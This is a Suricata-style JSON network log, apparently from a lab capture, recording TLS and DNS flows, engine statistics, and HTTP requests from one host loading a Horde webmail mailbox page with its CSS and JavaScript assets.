{"timestamp":"2020-02-29T00:23:03.006537+0000","flow_id":1839442932834932,"event_type":"flow","src_ip":"192.168.10.130","src_port":34234,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":26,"pkts_toclient":31,"bytes_toserver":3724,"bytes_toclient":32279,"start":"2020-02-29T00:21:44.434804+0000","end":"2020-02-29T00:21:49.758600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006701+0000","flow_id":867577733854192,"event_type":"flow","src_ip":"192.168.10.130","src_port":34256,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":117,"bytes_toserver":14695,"bytes_toclient":147060,"start":"2020-02-29T00:21:56.734192+0000","end":"2020-02-29T00:22:01.972112+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006862+0000","flow_id":2142770703138942,"event_type":"flow","src_ip":"192.168.10.130","src_port":34232,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":98,"pkts_toclient":146,"bytes_toserver":13683,"bytes_toclient":191039,"start":"2020-02-29T00:21:44.426110+0000","end":"2020-02-29T00:21:49.809005+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006962+0000","flow_id":2145609676489439,"event_type":"flow","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":80,"pkts_toclient":124,"bytes_toserver":9977,"bytes_toclient":163566,"start":"2020-02-29T00:21:44.197343+0000","end":"2020-02-29T00:21:50.074452+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007088+0000","flow_id":1040213943538856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34230,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":23,"pkts_toclient":27,"bytes_toserver":4419,"bytes_toclient":23565,"start":"2020-02-29T00:21:44.349352+0000","end":"2020-02-29T00:21:49.759472+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007163+0000","flow_id":948151319534199,"event_type":"flow","src_ip":"192.168.10.130","src_port":34240,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":63,"bytes_toserver":5995,"bytes_toclient":76626,"start":"2020-02-29T00:21:44.727671+0000","end":"2020-02-29T00:21:49.811419+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007244+0000","flow_id":823107642465495,"event_type":"flow","src_ip":"192.168.10.130","src_port":34260,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":4488,"start":"2020-02-29T00:21:56.924887+0000","end":"2020-02-29T00:22:01.968024+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007349+0000","flow_id":832002519790009,"event_type":"flow","src_ip":"192.168.10.130","src_port":34258,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":31,"pkts_toclient":40,"bytes_toserver":10242,"bytes_toclient":41891,"start":"2020-02-29T00:21:56.913849+0000","end":"2020-02-29T00:22:01.971946+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:04.004628+0000","flow_id":1572605190170049,"event_type":"flow","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:03.353729+0000","end":"2020-02-29T00:18:03.458627+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:07.000630+0000","flow_id":2079140748366751,"event_type":"flow","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:06.824223+0000","end":"2020-02-29T00:18:06.932681+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:08.000776+0000","flow_id":362352125925699,"event_type":"flow","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:07.317763+0000","end":"2020-02-29T00:18:07.426181+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:10.000240+0000","event_type":"stats","stats":{"uptime":15042,"capture":{"kernel_packets":139790,"kernel_drops":0},"decoder":{"pkts":139884,"bytes":96036227,"invalid":195,"ipv4":138317,"ipv6":10,"ethernet":139884,"raw":0,"null":0,"sll":0,"tcp":132773,"udp":5334,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2875,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2891,"synack":2882,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2440,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2522}},"flow_mgr":{"closed_pruned":2851,"new_pruned":17,"est_pruned":2501,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17849,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:23:10.326117+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48534,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:10.599487+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093}} {"timestamp":"2020-02-29T00:23:11.007440+0000","flow_id":1461949668569849,"event_type":"flow","src_ip":"192.168.10.130","src_port":34266,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1238,"bytes_toclient":653,"start":"2020-02-29T00:22:04.111353+0000","end":"2020-02-29T00:22:09.117658+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:11.007734+0000","flow_id":1370887756629374,"event_type":"flow","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:10.771454+0000","end":"2020-02-29T00:18:10.880127+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:11.007855+0000","flow_id":545279093472280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34262,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":140,"bytes_toserver":10673,"bytes_toclient":185900,"start":"2020-02-29T00:22:03.949272+0000","end":"2020-02-29T00:22:09.400447+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:12.000169+0000","flow_id":1665067602402,"event_type":"flow","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.152034+0000","end":"2020-02-29T00:18:11.260439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:12.000581+0000","flow_id":807637155517539,"event_type":"flow","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.398435+0000","end":"2020-02-29T00:18:11.506897+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:13.290183+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.300862+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41517,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43331,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:13.520499+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:23:13.538122+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} {"timestamp":"2020-02-29T00:23:13.547702+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:23:13.550207+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.550601+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:23:13.557270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:23:13.557697+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.559538+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.559949+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:23:13.562336+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:23:13.563141+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":1}} {"timestamp":"2020-02-29T00:23:13.566870+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:23:13.563707+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:23:13.569736+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:23:13.571705+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.572319+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:23:13.574621+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.574974+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:23:13.577326+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} {"timestamp":"2020-02-29T00:23:13.582471+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:23:13.584270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.584818+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":5}} 